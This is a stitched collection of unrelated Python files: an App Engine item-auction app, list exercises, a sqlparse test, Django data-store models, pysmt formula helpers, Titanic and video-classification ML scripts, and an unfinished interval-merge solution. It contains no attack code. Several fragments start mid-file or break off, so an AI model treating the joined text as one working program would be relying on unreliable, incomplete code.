    origin_price = ndb.IntegerProperty(required=True)
    start_price = ndb.IntegerProperty(required=True)
    current_price = ndb.IntegerProperty(required=True)
    buyer_num = ndb.IntegerProperty(default=0)
    current_buyer = ndb.StringProperty(required=True)  # buyer email, if any
    picture = ndb.StringProperty(indexed=False)
    confirmed = ndb.BooleanProperty(default=False)
class MainHandler(webapp2.RequestHandler):
    # Front page: item listing plus per-user and aggregate statistics.
    def get(self):
        # # admin
        # if not users.is_current_user_admin():
        #     self.redirect('/sorry')
        # user
        user = users.get_current_user()
        if user:
            # Logged-in view: unconfirmed items plus this user's purchases.
            user_url = users.create_logout_url(self.request.uri)
            user_url_linktext = 'Logout'
            # admin
            isAdmin = users.is_current_user_admin()
            # items
            items = Item.query(Item.confirmed == False).order(-Item.buyer_num).fetch(100)
            my_confirmed_items = Item.query(ndb.AND(
                Item.confirmed == True,
                Item.current_buyer == user.email()
            )).fetch(100)
            my_items = []
            my_total_price = 0
            # stat
            stat = {
                'item_num': len(items),
                'item_sold': 0,
                'item_total_buyer': 0
            }
            for item in items:
                if item.current_buyer == user.email():
                    item.is_mine = True
                    my_items.append(item)
                    my_total_price += item.current_price
                # Transient display-only flags consumed by the template.
                item.is_hot = bool(item.buyer_num >= 5)
                item.is_free = bool(item.current_price == 0)
                if item.current_buyer:
                    stat['item_sold'] += 1
                    stat['item_total_buyer'] += item.buyer_num
            if not stat['item_num']:
                stat['item_ratio'] = 0
            else:
                stat['item_ratio'] = float(stat['item_sold']) / float(stat['item_num']) * 100
            template_values = {
                'stat': stat,
                'items': items,
                'my_confirmed_items': my_confirmed_items,
                'has_items': bool(len(my_items) + len(my_confirmed_items)),
                'my_items': my_items,
                'my_total_price': my_total_price,
                'user': user,
                'user_url': user_url,
                'user_url_linktext': user_url_linktext,
                'isAdmin': isAdmin
            }
        else:
            # Anonymous view: statistics only, with a login link.
            user_url = users.create_login_url(self.request.uri)
            user_url_linktext = 'Login'
            # admin
            isAdmin = users.is_current_user_admin()
            # items
            items = Item.query().fetch(100)
            # stat
            stat = {
                'item_num': len(items),
                'item_sold': 0,
                'item_total_buyer': 0
            }
            for item in items:
                if item.current_buyer:
                    stat['item_sold'] += 1
                    stat['item_total_buyer'] += item.buyer_num
            if not stat['item_num']:
                stat['item_ratio'] = 0
            else:
                stat['item_ratio'] = float(stat['item_sold']) / float(stat['item_num']) * 100
            template_values = {
                'stat': stat,
                'user': user,
                'user_url': user_url,
                'user_url_linktext': user_url_linktext,
                'isAdmin': isAdmin
            }
        template = JINJA_ENVIRONMENT.get_template('index.html')
        self.response.write(template.render(template_values))
class SorryHandler(webapp2.RequestHandler):
    """Placeholder page shown while the site is under development."""

    def get(self):
        # admin
        login_url = users.create_login_url(self.request.uri)
        body = 'Sorry, under development. -- Ming'
        body += '<a href="' + login_url + '">LOGIN</a>'
        self.response.write(body)
class ConfirmHandler(webapp2.RequestHandler):
    """Marks the viewer's winning items as confirmed and emails a payment
    summary to the viewer."""

    def get(self):
        # user
        user = users.get_current_user()
        if not user:
            self.redirect('/')
        else:
            # All unconfirmed items the viewer currently holds.
            items = Item.query(ndb.AND(
                Item.confirmed == False,
                Item.current_buyer == user.email())).fetch(100)
            if not len(items):
                # Nothing to confirm.
                self.redirect('/')
            else:
                for item in items:
                    item.confirmed = True
                    item.put()
                s = '''
Dear %s,
Thank you for using my website.
You need to pay the following amount of money: $ %s.
Please reply this email ASAP (arranging pick up time)!!!
Best regards,
Ming
''' % (user.nickname(), sum([item.current_price for item in items]))
                # Bug fix: removed the discarded `s.encode(...)` call --
                # str.encode returns a new object, the original threw it away.
                mail.send_mail(
                    sender='Ming YIN <ym.kalasoo@gmail.com>',
                    to=user.email(),
                    subject='sellmystuffym Notification',
                    body=s
                )
                self.redirect('/')
class AddConfirmHandler(webapp2.RequestHandler):
    """Admin-only: reset the `confirmed` flag on every item."""

    def get(self):
        # Bug fix: webapp2's redirect() does not abort the handler, so
        # non-admin users previously fell through and reset the flags anyway.
        if not users.is_current_user_admin():
            self.redirect('/')
            return
        # items
        items = Item.query().order(-Item.buyer_num).fetch(100)
        for item in items:
            item.confirmed = False
            item.put()
        self.redirect('/')
class SendMailHandler(webapp2.RequestHandler):
    """Admin-only: compose and send a bulk email to every current high
    bidder on an unconfirmed item."""

    def get(self):
        # Bug fix: redirect() does not stop execution -- without the
        # `return`, non-admins continued into the admin-only code below.
        if not users.is_current_user_admin():
            self.redirect('/')
            return
        # Distinct buyer addresses over all unconfirmed items.
        items = Item.query(Item.confirmed == False).fetch(100)
        emails = list(set([item.current_buyer for item in items]))
        template_values = {
            'emails': emails
        }
        template = JINJA_ENVIRONMENT.get_template('sendmail.html')
        self.response.write(template.render(template_values))

    def post(self):
        # Bug fix: return after redirect (see get()).
        if not users.is_current_user_admin():
            self.redirect('/')
            return
        # items
        items = Item.query(Item.confirmed == False).fetch(100)
        emails = list(set([item.current_buyer for item in items]))
        subject = self.request.get('email_title') or 'sellmystuffym Notification'
        content = self.request.get('email_content')
        if not content:
            # Nothing to send; back to the compose form.
            self.redirect('/send_mail')
        else:
            for email in emails:
                if not email:
                    # Items nobody bid on have an empty buyer address.
                    continue
                s = '''
Dear %s,
''' % email + content + '''
Best regards,
Ming
'''
                # (dropped the stray `print s` debug statement)
                mail.send_mail(
                    sender='Ming YIN <ym.kalasoo@gmail.com>',
                    to=email,
                    subject=subject,
                    body=s
                )
            self.redirect('/send_mail')
class ImageHandler(webapp2.RequestHandler):
    """Serves the raw picture bytes of an item."""

    def get(self):
        # Bug fix: `ndb` has no module-level get() (that was the old `db`
        # API); resolve the urlsafe key instead.
        # NOTE(review): confirm callers pass a urlsafe key in `img_id`.
        item = ndb.Key(urlsafe=self.request.get('img_id')).get()
        # Bug fix: the original wrote `greeting.picture` -- `greeting` was
        # an undefined name; also guard against a missing item.
        if item and item.picture:
            self.response.out.write(item.picture)
class AddItemHandler(webapp2.RequestHandler):
    """Admin-only form for creating a new auction Item."""

    def get(self):
        # Bug fix: return after redirect so non-admins never see the form.
        if not users.is_current_user_admin():
            self.redirect('/')
            return
        template_values = {
        }
        template = JINJA_ENVIRONMENT.get_template('addItem.html')
        self.response.write(template.render(template_values))

    def post(self):
        # Bug fix: return after redirect (see get()).
        if not users.is_current_user_admin():
            self.redirect('/')
            return
        # new item instance
        item = self.gen_Item()
        if not item:
            # Required fields missing: back to the form.
            self.redirect('/add_item')
        else:
            item.put()
            # Bug fix: dropped the write() that followed redirect() -- the
            # body of a redirect response is discarded anyway.
            self.redirect('/')

    def gen_Item(self):
        """Build an Item from the POSTed form fields.

        Returns None when any required field is missing.
        """
        req = self.request
        name = req.get('item_name')
        item_type = req.get('item_type')
        description = req.get('item_desc')
        origin_price = req.get('origin_price')
        start_price = req.get('start_price')
        picture = req.get('picture')
        # check required fields (description and picture are optional)
        if not all([name, item_type, origin_price, start_price]):
            return None
        start_price = int(start_price)
        # A new item starts at its start price with no bids.
        return Item(
            name=name,
            item_type=item_type,
            description=description,
            origin_price=int(origin_price),
            start_price=start_price,
            current_price=start_price,
            buyer_num=0,
            current_buyer="",
            picture=picture
        )
class WantBuyHandler(webapp2.RequestHandler):
    """AJAX bid endpoint; responds with JSON {done, current_price[, error]}."""

    def post(self):
        # Default response: not done, price 0; `error` is set on failure.
        res = {
            'done': False,
            'current_price': 0
        }
        # user
        user = users.get_current_user()
        if not user:
            res['error'] = 'user'
            self.response.write(json.dumps(res))
            return
        # item
        item = Item.get_by_id(int(self.request.get('item_id')))
        if not item:
            res['error'] = 'item'
            self.response.write(json.dumps(res))
            return
        if item.start_price:
            # Priced item: a *different* user outbids by +1; re-clicking
            # by the current high bidder changes nothing.
            if user.email() != item.current_buyer:
                item.current_buyer = user.email()
                item.current_price += 1
                item.buyer_num += 1
        else:
            # Free item (start price 0): the first claimant wins.
            if not item.current_buyer:
                item.current_buyer = user.email()
                item.buyer_num += 1
            elif user.email() != item.current_buyer:
                # Somebody else already claimed the free item.
                res['error'] = 'free'
                self.response.write(json.dumps(res))
                return
        res['current_price'] = item.current_price
        item.put()
        res['done'] = True
        # return
        self.response.write(json.dumps(res))
# URL routing table for the auction application.
app = webapp2.WSGIApplication([
    ('/', MainHandler),
    ('/sorry', SorryHandler),
    ('/confirm', ConfirmHandler),
    ('/add_confirm', AddConfirmHandler),
    ('/send_mail', SendMailHandler),
    ('/img', ImageHandler),
    ('/add_item', AddItemHandler),
    ('/want_buy', WantBuyHandler)
], debug=True)
|
# Execercise form w3resources
# Link => https://www.w3resource.com/python-exercises/list/
from random import randint
# Build a list of 14 random integers in [1, 100] shared by all exercises.
lists = []
for i in range(1, 15):
    num = randint(1, 100)
    lists.append(num)
# 1. Sum all the items in a list.
print(lists)
print("Sum of list is " + str(sum(lists)))
# 2. NOTE(review): the exercise says "multiplies all the items" (a
# product), but this code doubles each element -- confirm intent.
newlist = []
count = 0
for i in lists:
    newlist.append(i * 2)
    count += 1
print(f'{count}' + str(newlist))
# 3. Largest number in the list.
print("Max num is " + str(max(lists)))
# 4. Smallest number in the list.
print("Min num is " + str(min(lists)))
# 5. Count strings where length is 2 or more and first == last character.
# NOTE(review): `len(string) > 2` excludes exactly-2-char strings like
# "ad", although the exercise says "2 or more" -- confirm.
string_list = ["tat", "ini", "door", "ad", "rand",
               "rar", "mom", "1991", "2002", "2020", "dad", "4333"]
print("The current list is ")
print(string_list)
total = 0
for string in string_list:
    if len(string) > 2 and string[0] == string[-1]:
        total += 1
print(f"Total words found {total}")
# 6. Remove duplicates within a list, keeping first occurrences.
# Bug fix: the original ended with a bare `for`, a SyntaxError.
unique_items = []
for item in lists:
    if item not in unique_items:
        unique_items.append(item)
print(unique_items)
|
import unittest

import pytest
import sqlparse
from sqlparse.experiments import view_handler as v
# Sample multi-view query exercised by the tests below.
sql='select v1.name as nom,V2.code,count(*) from view1 as v1, view2 as v2 where v1.code like "12345" group by nom;'
# NOTE(review): `sqlparse` is used here but only the
# `sqlparse.experiments` submodule is imported -- confirm a top-level
# `import sqlparse` exists in the real module.
query=sqlparse.parse(sql)
class TestGeneratedView(unittest.TestCase):
    """Tests for view_handler.GeneratedView."""

    # Shared fixture: a GeneratedView built from empty mappings.
    view = v.GeneratedView({}, {}, {})

    def test_root_exist(self):
        # Bug fix: the original line ended with a stray '|' (SyntaxError);
        # also use the unittest assertion helper for a better failure message.
        self.assertFalse(self.view.root_exists({}, {}))
from django.conf import settings
from django.db import models
from mongoengine import *
connect(settings.MONGODB_DATABASE)
class Profile(models.Model):
    """A user profile keyed by UUID; owner of all sharing settings below."""
    # UUID string (36 chars, canonical dashed form), unique and indexed.
    uuid = models.CharField(max_length=36, unique=True, blank = False, null = False, db_index = True)

    def getDBName(self):
        # Per-user database name: dashes are not valid in the name, so
        # replace them with underscores.
        return "User_" + str(self.uuid).replace("-", "_")

    def __unicode__(self):
        return self.uuid
class ResourceKey(models.Model):
    ''' A way of controlling sharing within a collection. Maps to any key within a collection. For example, funf probes and individual answers to questions'''
    key = models.CharField(max_length=120)
    # Whether this key is currently shared; defaults to shared.
    issharing = models.BooleanField(default=True)
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name = "resourcekey_owner")
class ProbeGroupSetting(models.Model):
    ''' A way of grouping resource keys for sharing.'''
    name = models.CharField(max_length=120)
    issharing = models.BooleanField(default=False)
    keys = models.ManyToManyField(ResourceKey) # the resource keys grouped under this setting
class Purpose(models.Model):
    """A named purpose for data access, owned by a Profile."""
    name = models.CharField(max_length=120)
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="purpose_owner")

    def __unicode__(self):
        return self.name + "(" + self.datastore_owner.uuid + ")"
class Scope(models.Model):
    """A named access scope tied to one or more purposes."""
    name = models.CharField(max_length=120)
    purpose = models.ManyToManyField(Purpose)
    issharing = models.BooleanField(default=False)
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="scope_owner")

    def __unicode__(self):
        return self.name + "(" + self.datastore_owner.uuid + ")"
class Role(models.Model):
    """ @name : The user defined name of the role
    @purpose : A list of purposes associated with this role
    @tokens : A list of oauth tokens of users assigned to this role
    (tokens field not yet implemented -- see the TODO below) """
    name = models.CharField(max_length=120)
    purpose = models.ManyToManyField(Purpose)
    issharing = models.BooleanField(default=False)
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="role_owner")

    def __unicode__(self):
        return self.name + "(" + self.datastore_owner.uuid + ")"

# TODO: fill in field for tokens (rather than ints / uuids)
# TODO: fill in field for tokens (rather than ints / uuids)
class SharingLevel(models.Model):
    """An integer sharing level selectable per owner, tied to purposes."""
    level = models.IntegerField()
    purpose = models.ManyToManyField(Purpose)
    isselected = models.BooleanField(default=False)
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="sharinglevel_owner")

    def __unicode__(self):
        return str(self.level) + "(" + self.datastore_owner.uuid + ")"
class AuditEntry(models.Model):
    '''
    Represents an audit of a request against the PDS
    Given that there will be many entries (one for each request),
    we are strictly limiting the size of data entered for each row
    The assumption is that script names and symbolic user ids
    will be under 64 characters
    '''
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="auditentry_owner", db_index=True)
    requester = models.ForeignKey(Profile, blank = False, null = False, related_name="auditentry_requester", db_index=True)
    method = models.CharField(max_length=10)
    scopes = models.CharField(max_length=1024) # actually storing csv of valid scopes
    purpose = models.CharField(max_length=64, blank=True, null=True)
    script = models.CharField(max_length=64)
    token = models.CharField(max_length=64)
    system_entity_toggle = models.BooleanField()
    trustwrapper_result = models.CharField(max_length=64)
    timestamp = models.DateTimeField(auto_now_add = True, db_index=True)

    def __unicode__(self):
        # Bug fix: the original evaluated self.pk without returning it,
        # so __unicode__ always yielded None.
        return u'%s' % self.pk
class Notification(models.Model):
    '''
    Represents a notification about a user's data. This can be filled in while constructing answers
    '''
    datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="notification_owner")
    title = models.CharField(max_length = 64, blank = False, null = False)
    content = models.CharField(max_length = 1024, blank = False, null = False)
    type = models.IntegerField(blank = False, null = False)
    timestamp = models.DateTimeField(auto_now_add = True)
    uri = models.URLField(blank = True, null = True)

    def __unicode__(self):
        # Bug fix: the original evaluated self.pk without returning it,
        # so __unicode__ always yielded None.
        return u'%s' % self.pk
class Device(models.Model):
    """A device registered for GCM push notifications, per owner."""
    datastore_owner = models.ForeignKey(Profile, blank=False, null=False, related_name="device_owner", db_index=True)
    # Google Cloud Messaging registration id for this device.
    gcm_reg_id = models.CharField(max_length=1024, blank=False, null=False)
|
from typing import Optional, Iterator, Iterable, FrozenSet, Tuple, List, Dict
import io
from math import ceil, log as mlog
from itertools import chain
from pysmt.environment import Environment as PysmtEnv
from pysmt.formula import FormulaManager
from pysmt.fnode import FNode
import pysmt.typing as types
from pysmt.shortcuts import And
from pysmt.smtlib.script import smtlibscript_from_formula
from pysmt.logics import QF_NRA
from smv_prefixes import NEXT_MONITOR_PREFIX
from rewritings import TimesDistributor
__VERBOSE = 0
def set_verbosity(val: int):
    """Set the module-wide verbosity level."""
    assert isinstance(val, int)
    global __VERBOSE
    __VERBOSE = val
def get_verbosity() -> int:
    """Return the module-wide verbosity level."""
    # Reading a module global needs no `global` declaration.
    return __VERBOSE
def log(msg: str, lvl: int = 5) -> None:
    """Print msg when the current verbosity is at least lvl."""
    assert isinstance(msg, str)
    if get_verbosity() < lvl:
        return
    print(msg, flush=__debug__)
def pysmt_dump_whole_expr() -> None:
    # workaround to print whole expressions: rebind FNode.__str__ to
    # serialize so printing an FNode shows the full expression tree.
    FNode.__str__ = FNode.serialize
def to_smt2(env: PysmtEnv, *formulas, logic=QF_NRA) -> str:
    """Serialize the conjunction of `formulas` as an SMT-LIB v2 script string."""
    assert isinstance(env, PysmtEnv)
    script = smtlibscript_from_formula(env.formula_manager.And(*formulas),
                                       logic=logic, env=env)
    with io.StringIO() as buf:
        script.serialize(buf, env=env)
        return buf.getvalue()
def name_next(symb: str) -> str:
    """return smv monitor symbol for next assignment of input symb"""
    assert isinstance(symb, str)
    return NEXT_MONITOR_PREFIX + symb
def name_is_next(symb: str) -> bool:
    """True iff symb refers to next assignment"""
    assert isinstance(symb, str)
    prefix = NEXT_MONITOR_PREFIX
    return symb[:len(prefix)] == prefix
def name_next_to_curr(symb: str) -> str:
    """return smv monitor symbol for current assignment of input symb"""
    assert name_is_next(symb)
    prefix_len = len(NEXT_MONITOR_PREFIX)
    return symb[prefix_len:]
def symb_is_next(symb: FNode) -> bool:
    """True iff symb refers to next assignment"""
    assert isinstance(symb, FNode)
    assert symb.is_symbol()
    # Delegate the string check to the name-level helper.
    return name_is_next(symb.symbol_name())
def symb_is_curr(symb: FNode) -> bool:
    """True iff symb does not refer to next assignment"""
    if symb_is_next(symb):
        return False
    return True
def symb_to_next(mgr: FormulaManager, s: FNode) -> FNode:
    """Get monitor for next(s): symbol named NEXT_MONITOR_PREFIX + name,
    with the same type as s."""
    assert isinstance(mgr, FormulaManager)
    assert isinstance(s, FNode)
    assert s.is_symbol()
    assert s in mgr.get_all_symbols()
    # Applying "next" twice is not allowed.
    assert not name_is_next(s.symbol_name())
    return mgr.Symbol(name_next(s.symbol_name()), s.symbol_type())
def to_next(mgr: FormulaManager, expr: FNode, symbols: Iterable) -> FNode:
    """Replace symbols with the corresponding monitor for next(symbol)"""
    assert isinstance(mgr, FormulaManager)
    assert isinstance(expr, FNode)
    assert isinstance(symbols, Iterable)
    assert all(s in mgr.get_all_symbols() for s in symbols)
    # Single simultaneous substitution of every current-state symbol.
    return mgr.env.substituter.substitute(expr,
                                          {s: symb_to_next(mgr, s)
                                           for s in symbols})
def symb_to_curr(mgr: FormulaManager, x_s: FNode) -> FNode:
    """Get current assignment symbol: inverse of symb_to_next."""
    assert name_is_next(x_s.symbol_name())
    return mgr.Symbol(name_next_to_curr(x_s.symbol_name()), x_s.symbol_type())
def to_curr(mgr: FormulaManager, expr: FNode, symbols: Iterable) -> FNode:
    """Replace next symbols with current symbols.

    `symbols` are the *current*-state symbols; their next-monitors are
    mapped back onto them.
    """
    assert isinstance(mgr, FormulaManager)
    assert isinstance(expr, FNode)
    assert isinstance(symbols, Iterable)
    assert expr in mgr.formulae.values()
    # NOTE(review): mgr.env.ao presumably exposes atom extraction --
    # confirm against the pysmt environment wrapper in use.
    assert all(e in mgr.formulae.values() for e in mgr.env.ao.get_atoms(expr))
    return mgr.env.substituter.substitute(expr,
                                          {symb_to_next(mgr, s): s
                                           for s in symbols})
def default_key(x: FNode) -> tuple:
    """Deterministic sort key for FNodes: constant flag, node type, node id."""
    assert isinstance(x, FNode)
    return x.is_constant(), x.node_type(), x.node_id()
def is_atom(p: FNode) -> bool:
    """Test whether the formula is an atomic boolean predicate

    A literal is an atom, a theory relation is an atom, a boolean
    constant is an atom.  A non-boolean constant is not an atom.
    """
    assert isinstance(p, FNode)
    if p.is_bool_constant():
        return True
    return p.is_literal() or p.is_theory_relation()
def is_not_true(p: FNode) -> bool:
    """True unless p is the TRUE constant."""
    assert isinstance(p, FNode)
    if p.is_true():
        return False
    return True
def not_rel(env: PysmtEnv, rel: FNode) -> FNode:
    """Negate a relation without introducing a Not node.

    TRUE <-> FALSE, (a <= b) -> (a > b), (a < b) -> (a >= b).
    Only constants, LE and LT are supported (see the assert).
    """
    assert isinstance(env, PysmtEnv)
    assert isinstance(rel, FNode)
    assert rel in env.formula_manager.formulae.values()
    mgr = env.formula_manager
    if rel.is_true():
        return mgr.FALSE()
    if rel.is_false():
        return mgr.TRUE()
    assert rel.is_le() or rel.is_lt()
    return mgr.GT(rel.arg(0), rel.arg(1)) if rel.is_le() else \
        mgr.GE(rel.arg(0), rel.arg(1))
def assign2fnode(env: PysmtEnv, k: FNode, v: FNode) -> FNode:
    """Encode the assignment k := v as an equality-like formula.

    Non-boolean (or non-atomic) keys use Equals; a boolean key with a
    constant value collapses to k or Not(k); otherwise Iff(k, v).
    """
    assert isinstance(env, PysmtEnv)
    assert isinstance(k, FNode)
    assert isinstance(v, FNode)
    assert k in env.formula_manager.formulae.values()
    assert v in env.formula_manager.formulae.values()
    # Key and value must have the same type.
    assert env.stc.walk(k) == env.stc.walk(v)
    mgr = env.formula_manager
    tc = env.stc.walk
    if not is_atom(k) or not tc(k).is_bool_type():
        return mgr.Equals(k, v)
    if v.is_true():
        assert v is mgr.TRUE()
        return k
    if v.is_false():
        assert v is mgr.FALSE()
        return mgr.Not(k)
    assert tc(k).is_bool_type()
    assert tc(v).is_bool_type()
    return mgr.Iff(k, v)
def assign2fnodes(env: PysmtEnv,
                  *assigns: Dict[FNode, FNode]) -> Iterator[FNode]:
    """Yield assign2fnode(env, k, v) for every (k, v) over all assignment
    dicts, in order."""
    assert isinstance(env, PysmtEnv)
    assert all(isinstance(assign, dict) for assign in assigns)
    assert all(isinstance(k, FNode) for assign in assigns for k in assign)
    assert all(k in env.formula_manager.formulae.values()
               for assign in assigns for k in assign)
    assert all(isinstance(v, FNode)
               for assign in assigns for v in assign.values())
    assert all(v in env.formula_manager.formulae.values()
               for assign in assigns for v in assign.values())
    assert all(not k.is_literal() or env.stc.get_type(k).is_bool_type()
               for assign in assigns for k in assign)
    # Lazily flatten all dicts into one stream of encoded assignments.
    yield from (assign2fnode(env, k, v)
                for k, v in chain.from_iterable(assign.items()
                                                for assign in assigns))
def new_symb(mgr: FormulaManager, base: str, s_type) -> FNode:
    """Return fresh symbol of the given type, named base + counter."""
    assert isinstance(mgr, FormulaManager)
    assert s_type in {types.BOOL, types.INT, types.REAL}
    assert isinstance(base, str)
    # "%d" is appended below; base must not already contain it.
    assert "%d" not in base
    return mgr.new_fresh_symbol(s_type, f"{base}%d")
def linear_comb(env: PysmtEnv, symbs: FrozenSet[FNode],
                prefix: str,
                idx: Optional[int] = None,
                totime=None) -> Tuple[FNode, List[FNode]]:
    """Return FNode expr representing linear combination of symbs and
    list of parameters.

    The expression is k + sum(c_i * s_i) where k and the c_i are fresh
    parameter symbols (returned in `params`).  When `idx` is given, each
    symbol is first mapped through totime(s, idx).
    """
    assert isinstance(symbs, frozenset)
    assert all(isinstance(s, FNode) for s in symbs)
    assert all(s in env.formula_manager.formulae.values() for s in symbs)
    assert isinstance(prefix, str)
    assert idx is None or totime is not None
    assert idx is None or isinstance(idx, int), idx
    # All symbols must share one numeric type (all INT or all REAL).
    assert all(env.stc.get_type(s).is_int_type() for s in symbs) or \
        all(env.stc.get_type(s).is_real_type() for s in symbs)
    m_type = types.REAL
    if symbs and env.stc.get_type(next(iter(symbs))).is_int_type():
        m_type = types.INT
    mgr = env.formula_manager
    # Constant term of the combination.
    k = new_symb(mgr, f"{prefix}_k", m_type)
    res = [k]
    params = [k]
    for s in symbs:
        if idx is not None:
            assert totime is not None
            # Instantiate the symbol at time step idx.
            s = totime(s, idx)
        coeff = new_symb(mgr, f"{prefix}_c", m_type)
        params.append(coeff)
        res.append(mgr.Times(coeff, s))
    res = mgr.Plus(res)
    assert all(p in mgr.get_all_symbols() for p in params)
    return res, params
def new_enum(env: PysmtEnv, v_name: str, enum_size: int) -> \
        Tuple[List[FNode], List[FNode]]:
    """Create boolean symbols to encode `enum_size` different values.

    Uses a binary encoding with ceil(log2(enum_size)) fresh booleans.
    Returns (b_vars, vals) where vals[i] is the conjunction of
    (possibly negated) b_vars encoding value i; b_vars[0] is the least
    significant bit (bit string is enumerated reversed below).
    """
    assert isinstance(env, PysmtEnv)
    assert isinstance(v_name, str)
    assert isinstance(enum_size, int)
    assert enum_size > 1
    mgr = env.formula_manager
    num_bits = ceil(mlog(enum_size, 2))
    b_vars = [new_symb(mgr, f"{v_name}{idx}", types.BOOL)
              for idx in range(num_bits)]
    vals = []
    for enum_val in range(enum_size):
        # Fixed-width binary string of enum_val, MSB first.
        bit_val = format(enum_val, '0{}b'.format(num_bits))
        assert len(bit_val) == num_bits
        assert all(c in {'0', '1'} for c in bit_val)
        vals.append(mgr.And(b_vars[idx] if c == '1' else
                            mgr.Not(b_vars[idx])
                            for idx, c in enumerate(reversed(bit_val))))
    assert len(vals) == enum_size
    return b_vars, vals
|
import pandas as pd
from Titanic.titanic_lib import *
def run_column_boxplot(input_file, column, by=None):
    """Load `input_file` as a DataFrame and draw a boxplot of `column`."""
    frame = pd.read_csv(input_file)
    return column_boxplot(data=frame, column=column, by=by)
def run_column_barchart(input_file, column, by):
    """Load `input_file` as a DataFrame and draw a bar chart of `column`."""
    frame = pd.read_csv(input_file)
    return column_barchart(data=frame, column=column, by=by)
def run_test_classification_pipeline(input_file, target_feature, pipeline, gridsearch_params):
    """Load and impute the CSV, then grid-search the given pipeline."""
    frame = pd.read_csv(input_file)
    features = impute_titanic_data(frame, target_feature)
    labels = frame[target_feature]
    return test_classification_pipeline(
        X=features,
        y=labels,
        pipeline=pipeline,
        gridsearch_params=gridsearch_params
    )
def run_make_prediction(train_file, test_file, target_feature, pipeline):
    """Fit on the training CSV, predict on the test CSV and return a
    Kaggle-style submission frame (PassengerId, Survived)."""
    train = pd.read_csv(train_file)
    test = pd.read_csv(test_file)
    X_train = impute_titanic_data(train, target_feature)
    X_test = impute_titanic_data(test, target_feature)
    predicted = make_prediction(X_train=X_train, y_train=train[target_feature],
                                X_test=X_test, pipeline=pipeline)
    return pd.DataFrame({
        'PassengerId': test['PassengerId'],
        'Survived': predicted
    })
|
# %%
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import sys
sys.path.insert(0, os.path.dirname('.'))
sys.path.insert(0, os.path.dirname('../'))
from data_utils import video_to_frames
from data_utils import metadata_loader
from data_utils.kth_dataset_builder import DatasetBuilder
from models.IMAGENET import Imagenet, Video_Feature_Extractor
from models.IMAGENET import AVG_Video_Classifier, LSTM_Video_Classifier
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Activation, Dense, Conv3D, MaxPool3D, Flatten, Dropout, BatchNormalization, LSTM, Conv2D
from tensorflow.keras.layers import GlobalAveragePooling1D, GlobalAveragePooling2D, TimeDistributed
from tensorflow.keras.optimizers import RMSprop
from tensorflow.keras.losses import CategoricalCrossentropy
# Load Dataset
video_path = './data/kth-actions/video'
frame_path = './data/kth-actions/frame'
# Setup builder
# NOTE(review): the two assignments below immediately overwrite the
# './data' paths above -- the first pair is dead; confirm which prefix
# is intended.
video_path = '../data/kth-actions/video'
frame_path = '../data/kth-actions/frame'
builder = DatasetBuilder(video_path, frame_path, img_width=84, img_height=84, ms_per_frame=1000, max_frames=16)
# Convert videos and generate metadata
#builder.convert_videos_to_frames()
metadata = builder.generate_metadata()
# Build datasets
train_ds = builder.make_video_dataset(metadata=metadata['train'])
valid_ds = builder.make_video_dataset(metadata=metadata['valid'])
# Preprocess dataset
IMG_SIZE = 160 # All images will be resized to 160x160
IMG_SHAPE = [IMG_SIZE, IMG_SIZE, 3]
def format_example(image, label):
    """Repeat the single channel 3x (axis 3) and resize frames to
    IMG_SHAPE, pinning the static shape for Keras."""
    image = tf.repeat(image,3,axis=3)
    image = tf.image.resize(image, IMG_SHAPE[0:2])
    image.set_shape([None]+IMG_SHAPE)
    return image, label
train_ds = train_ds.map(format_example)
valid_ds = valid_ds.map(format_example)
# Print a sample batch shape as a sanity check
for x, lab in valid_ds.take(1):
    print(x.shape, lab.shape)
print(train_ds)
# %%
def My_Video_Classifier(features, class_nr, optimizer='adam'):
    """Build and compile an LSTM classifier over per-frame features.

    features: Keras model/layer producing a (frames, 2048) sequence.
    class_nr: number of output classes; the head emits raw logits
    (loss uses from_logits=True).
    """
    # model
    full_model = tf.keras.Sequential([
        features,
        LSTM(1024, input_shape=(None,2048)),
        Dense(512, kernel_initializer="he_normal"),
        Dropout(rate=0.4),
        Dense(class_nr)
    ])
    #compile model
    full_model.compile(
        optimizer=optimizer,
        loss=CategoricalCrossentropy(from_logits=True),
        metrics=['accuracy']
    )
    return full_model
# Base model (returns pretrained frozen base model trained on Imagenet)
inception = Imagenet(input_shape=IMG_SHAPE, name='inception')
# Feature Extractor (has output (NR_FRAME x D) where D is the feature dimension)
featuer_ex = Video_Feature_Extractor(inception)
# LSTM Classifier
model = My_Video_Classifier(features=featuer_ex, class_nr=6)
model.summary()
|
from django.shortcuts import render,HttpResponse
from django.http import HttpResponseRedirect
def global_data(view_func):
    """View decorator; currently a passthrough that forwards the request.

    The wrapper accepts an optional `code` argument (ignored) so URLconfs
    may pass a captured group without breaking the view.
    """
    import functools

    # Bug fix: the original `return login_check` line ended with a stray
    # '|' (SyntaxError).  Also preserve the wrapped view's metadata.
    @functools.wraps(view_func)
    def login_check(request, code=0):
        return view_func(request)
    return login_check
from django.conf.urls import url
from . import views
# Route the VK OAuth callback to the auth view.
urlpatterns = [
    url(r'^auth$', views.vk_auth, name='vk_auth'),
]
|
class Interval:
    """Closed interval [start, end] with defaults of 0."""

    def __init__(self, s=0, e=0):
        self.start = s
        self.end = e
class Solution:
    # @param {Interval[]} intervals
    # @param {Interval} newInterval
    # @return {Interval[]}
    def insert(self, intervals, newInterval):
        """Insert newInterval into a sorted, non-overlapping interval list,
        merging overlaps.

        State flag t: '' = not placed yet, 'i' = merge in progress
        (start fixed, searching for the end), 'x' = placed (copy rest).
        Note: mutates newInterval in place while merging.
        """
        start = newInterval.start
        end = newInterval.end
        t = ''
        ans = []
        if len(intervals) == 0:
            return [newInterval]
        for i in intervals:
            if t == '' and start > i.end:
                # i lies entirely before the new interval: keep it.
                ans.append(i)
            elif t == '' and end < i.start:
                # New interval fits entirely before i: place both.
                t = 'x'
                ans.append(newInterval)
                ans.append(i)
            elif t == '' and start < i.start and end <= i.end:
                # Overlaps the front of i: merge, ending at i.end.
                t = 'x'
                newInterval.end = i.end
                ans.append(newInterval)
